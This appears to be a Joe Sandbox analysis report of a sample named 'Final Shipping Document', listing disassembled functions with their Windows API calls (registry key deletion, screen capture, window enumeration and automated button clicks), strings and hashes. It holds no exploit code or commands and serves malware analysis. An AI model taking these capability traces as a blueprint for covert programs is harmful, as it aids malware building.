                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385D7
                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385E0
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385E7
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385F8
                                                            • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00C3FC38,?), ref: 00C38611
                                                            • GlobalFree.KERNEL32(00000000), ref: 00C38621
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00C38641
                                                            • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00C38671
                                                            • DeleteObject.GDI32(?), ref: 00C38699
                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C386AF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID:
                                                            • API String ID: 3840717409-0
                                                            • Opcode ID: c401f22a0ae686673e2cac2a7e48ad999b53354bc73eba01c4abcffa6b05c218
                                                            • Instruction ID: 58b6dd401ccec6fa8b0ee3be4bb1eb067f5a31db876c04bddb644f213d326417
                                                            • Opcode Fuzzy Hash: c401f22a0ae686673e2cac2a7e48ad999b53354bc73eba01c4abcffa6b05c218
                                                            • Instruction Fuzzy Hash: 46412875610208AFDB119FA5CC89FAF7BB8FF89B11F108059F915E7260DB319A05DB60
                                                            Function 00C114BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(00000000), ref: 00C11502
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00C1150B
                                                            • VariantClear.OLEAUT32(?), ref: 00C11517
                                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C115FB
                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 00C11657
                                                            • VariantInit.OLEAUT32(?), ref: 00C11708
                                                            • SysFreeString.OLEAUT32(?), ref: 00C1178C
                                                            • VariantClear.OLEAUT32(?), ref: 00C117D8
                                                            • VariantClear.OLEAUT32(?), ref: 00C117E7
                                                            • VariantInit.OLEAUT32(00000000), ref: 00C11823
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                            • API String ID: 1234038744-3931177956
                                                            • Opcode ID: 34dba2356f8c9a9b4ee83df562348fe8b189ccb597aad4f2b4c8008ab055cf80
                                                            • Instruction ID: 63cec1f56a1cf3c24d126d50ad4a6ae5f36b218ed84ba707115adec0662e8d8e
                                                            • Opcode Fuzzy Hash: 34dba2356f8c9a9b4ee83df562348fe8b189ccb597aad4f2b4c8008ab055cf80
                                                            • Instruction Fuzzy Hash: FDD11531A00119DBCB109F65D884BFDB7F6BF46700F188095FA56AB180DB78DD80EB92
                                                            Function 00C2B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00C2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C2B6AE,?,?), ref: 00C2C9B5
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2C9F1
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA68
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA9E
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2B6F4
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C2B772
                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 00C2B80A
                                                            • RegCloseKey.ADVAPI32(?), ref: 00C2B87E
                                                            • RegCloseKey.ADVAPI32(?), ref: 00C2B89C
                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C2B8F2
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C2B904
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C2B922
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C2B983
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C2B994
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 146587525-4033151799
                                                            • Opcode ID: 70fdcc626daf5fb7f9896aff8cdec3e8a24bec4f8e8fb9f991d63fcb9080ee01
                                                            • Instruction ID: e728d59b44ad61e70c00fb147a64a07fccf3b152c4fd47685b07e4c17a5f94b8
                                                            • Opcode Fuzzy Hash: 70fdcc626daf5fb7f9896aff8cdec3e8a24bec4f8e8fb9f991d63fcb9080ee01
                                                            • Instruction Fuzzy Hash: B6C1AC34208211AFD714DF24D495F2ABBE5FF85308F14849CF5AA8B6A2CB31ED45CB91
                                                            Function 00C2255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 00C225D8
                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C225E8
                                                            • CreateCompatibleDC.GDI32(?), ref: 00C225F4
                                                            • SelectObject.GDI32(00000000,?), ref: 00C22601
                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C2266D
                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C226AC
                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C226D0
                                                            • SelectObject.GDI32(?,?), ref: 00C226D8
                                                            • DeleteObject.GDI32(?), ref: 00C226E1
                                                            • DeleteDC.GDI32(?), ref: 00C226E8
                                                            • ReleaseDC.USER32(00000000,?), ref: 00C226F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            • Opcode ID: 1c408d801324a0155644dfcf58cdb999c6e6cba77de815003793959e9af9e748
                                                            • Instruction ID: d9c3d8764872d0bed250352a0da5b2ecf236cbb56823d4d0eb9d3bca2b23d0b8
                                                            • Opcode Fuzzy Hash: 1c408d801324a0155644dfcf58cdb999c6e6cba77de815003793959e9af9e748
                                                            • Instruction Fuzzy Hash: 4261E276D00219EFCF14CFA8D884AAEBBF6FF48310F208529E955A7250D774A951DFA0
                                                            Function 00BDDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 00BDDAA1
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD659
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD66B
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD67D
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD68F
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6A1
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6B3
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6C5
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6D7
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6E9
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6FB
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD70D
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD71F
                                                              • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD731
                                                            • _free.LIBCMT ref: 00BDDA96
                                                              • Part of subcall function 00BD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000), ref: 00BD29DE
                                                              • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                            • _free.LIBCMT ref: 00BDDAB8
                                                            • _free.LIBCMT ref: 00BDDACD
                                                            • _free.LIBCMT ref: 00BDDAD8
                                                            • _free.LIBCMT ref: 00BDDAFA
                                                            • _free.LIBCMT ref: 00BDDB0D
                                                            • _free.LIBCMT ref: 00BDDB1B
                                                            • _free.LIBCMT ref: 00BDDB26
                                                            • _free.LIBCMT ref: 00BDDB5E
                                                            • _free.LIBCMT ref: 00BDDB65
                                                            • _free.LIBCMT ref: 00BDDB82
                                                            • _free.LIBCMT ref: 00BDDB9A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: a393b98b9347255d43ac8206d6fab5d9af89111889d8ce3854470f674872c004
                                                            • Instruction ID: e223bb26a51d9ea730e9cc9c2287456d3a94fc1fb92a36635a21e916effad5ef
                                                            • Opcode Fuzzy Hash: a393b98b9347255d43ac8206d6fab5d9af89111889d8ce3854470f674872c004
                                                            • Instruction Fuzzy Hash: DE315A356046459FEB21AB38E845B6AF7E8FF10314F1584ABE489D7391FA34AC409B20
                                                            Function 00C0365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00C0369C
                                                            • _wcslen.LIBCMT ref: 00C036A7
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C03797
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00C0380C
                                                            • GetDlgCtrlID.USER32(?), ref: 00C0385D
                                                            • GetWindowRect.USER32(?,?), ref: 00C03882
                                                            • GetParent.USER32(?), ref: 00C038A0
                                                            • ScreenToClient.USER32(00000000), ref: 00C038A7
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00C03921
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00C0395D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                            • String ID: %s%u
                                                            • API String ID: 4010501982-679674701
                                                            • Opcode ID: 6565902acb1d345fa174629a84ae3e51fb938cad81489d18f656053019c11cd8
                                                            • Instruction ID: 8de6e12f5f6a555d261b9e6daa6b5b5c8c73d761f517ce660d75ff8fe8af9335
                                                            • Opcode Fuzzy Hash: 6565902acb1d345fa174629a84ae3e51fb938cad81489d18f656053019c11cd8
                                                            • Instruction Fuzzy Hash: CE918C71204646AFDB19DF24C885FAAB7ECFF44350F008629F9A9D21D1DB30EA55CBA1
                                                            Function 00C04954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00C04994
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00C049DA
                                                            • _wcslen.LIBCMT ref: 00C049EB
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00C049F7
                                                            • _wcsstr.LIBVCRUNTIME ref: 00C04A2C
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00C04A64
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00C04A9D
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00C04AE6
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00C04B20
                                                            • GetWindowRect.USER32(?,?), ref: 00C04B8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                            • String ID: ThumbnailClass
                                                            • API String ID: 1311036022-1241985126
                                                            • Opcode ID: 71845048ac4aa543b684155eeb36bcb2ece8c145160158a26521ee4cd9ad2c36
                                                            • Instruction ID: 4a447998a54827e620849f869387d999732e62eec11d0ac52c9e8562a894913a
                                                            • Opcode Fuzzy Hash: 71845048ac4aa543b684155eeb36bcb2ece8c145160158a26521ee4cd9ad2c36
                                                            • Instruction Fuzzy Hash: 5A919CB21082059BDB18DF14C985FAB77E8FF84354F048469FE959A0D6EB30EE45CBA1
                                                            Function 00C38D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C38D5A
                                                            • GetFocus.USER32 ref: 00C38D6A
                                                            • GetDlgCtrlID.USER32(00000000), ref: 00C38D75
                                                            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00C38E1D
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C38ECF
                                                            • GetMenuItemCount.USER32(?), ref: 00C38EEC
                                                            • GetMenuItemID.USER32(?,00000000), ref: 00C38EFC
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C38F2E
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C38F70
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C38FA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                            • String ID: 0
                                                            • API String ID: 1026556194-4108050209
                                                            • Opcode ID: ac8bfa5c06fec1a6dc38c8a57ed79eccb0d330848b7832dd8f41d22dad1c5974
                                                            • Instruction ID: 54b9bc9255a1a2ce1042d32657c922e723273af9aca3f4d11a6f07f1f21db1a6
                                                            • Opcode Fuzzy Hash: ac8bfa5c06fec1a6dc38c8a57ed79eccb0d330848b7832dd8f41d22dad1c5974
                                                            • Instruction Fuzzy Hash: BC81CF715183019FDB20CF24C884AAFBBE9FF88314F14095DF9A4A7291DB70DA08DBA1
                                                            Function 00C0DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C0DC20
                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C0DC46
                                                            • _wcslen.LIBCMT ref: 00C0DC50
                                                            • _wcsstr.LIBVCRUNTIME ref: 00C0DCA0
                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C0DCBC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 1939486746-1459072770
                                                            • Opcode ID: a7bb65e57b16c2e0734f12502476c8ff8b6837d3e647a36651e3aa9a2ab40f2a
                                                            • Instruction ID: 1e9da194bc001b9ec9fae6e88439d88cbd6c5c4957cd897d6885676c58f19095
                                                            • Opcode Fuzzy Hash: a7bb65e57b16c2e0734f12502476c8ff8b6837d3e647a36651e3aa9a2ab40f2a
                                                            • Instruction Fuzzy Hash: B041DD329402017BEB14ABB49C87FBF77ACEF46710F1000AAF901A61C2EA60DA0197B5
                                                            Function 00C2CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C2CC64
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00C2CC8D
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C2CD48
                                                              • Part of subcall function 00C2CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00C2CCAA
                                                              • Part of subcall function 00C2CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00C2CCBD
                                                              • Part of subcall function 00C2CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C2CCCF
                                                              • Part of subcall function 00C2CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C2CD05
                                                              • Part of subcall function 00C2CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C2CD28
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C2CCF3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2734957052-4033151799
                                                            • Opcode ID: f3bd8e2c752665007434adedbdf21698e20e75d6a941434c1bf78b294d5364d8
                                                            • Instruction ID: 0e58cf50d1e116c287d4149a66197beb8a184db695e6b8c52b49a2c846b64817
                                                            • Opcode Fuzzy Hash: f3bd8e2c752665007434adedbdf21698e20e75d6a941434c1bf78b294d5364d8
                                                            • Instruction Fuzzy Hash: EE315A76901129BBDB208B65ECC8FFFBB7CEF45750F000165E916E3240DA749A45ABA0
                                                            Function 00C0E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • timeGetTime.WINMM ref: 00C0E6B4
                                                              • Part of subcall function 00BBE551: timeGetTime.WINMM(?,?,00C0E6D4), ref: 00BBE555
                                                            • Sleep.KERNEL32(0000000A), ref: 00C0E6E1
                                                            • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00C0E705
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C0E727
                                                            • SetActiveWindow.USER32 ref: 00C0E746
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C0E754
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C0E773
                                                            • Sleep.KERNEL32(000000FA), ref: 00C0E77E
                                                            • IsWindow.USER32 ref: 00C0E78A
                                                            • EndDialog.USER32(00000000), ref: 00C0E79B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1194449130-3405671355
                                                            • Opcode ID: 4e0b38c9e1dd85083a57bcf917b7320e26c9788b2e8b0b1cabab5acd3159cf4f
                                                            • Instruction ID: 3ada18c06d76c8fb49f3d3e6b204ad62943dbf76e9a2c520443a1bd2a4e04ceb
                                                            • Opcode Fuzzy Hash: 4e0b38c9e1dd85083a57bcf917b7320e26c9788b2e8b0b1cabab5acd3159cf4f
                                                            • Instruction Fuzzy Hash: 7C21A570250604AFEB106F64ECC9B2D3B6DF754389F140825F91AD11F1DB71AC40EB24
                                                            Function 00C0E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C0EA5D
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C0EA73
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C0EA84
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C0EA96
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C0EAA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
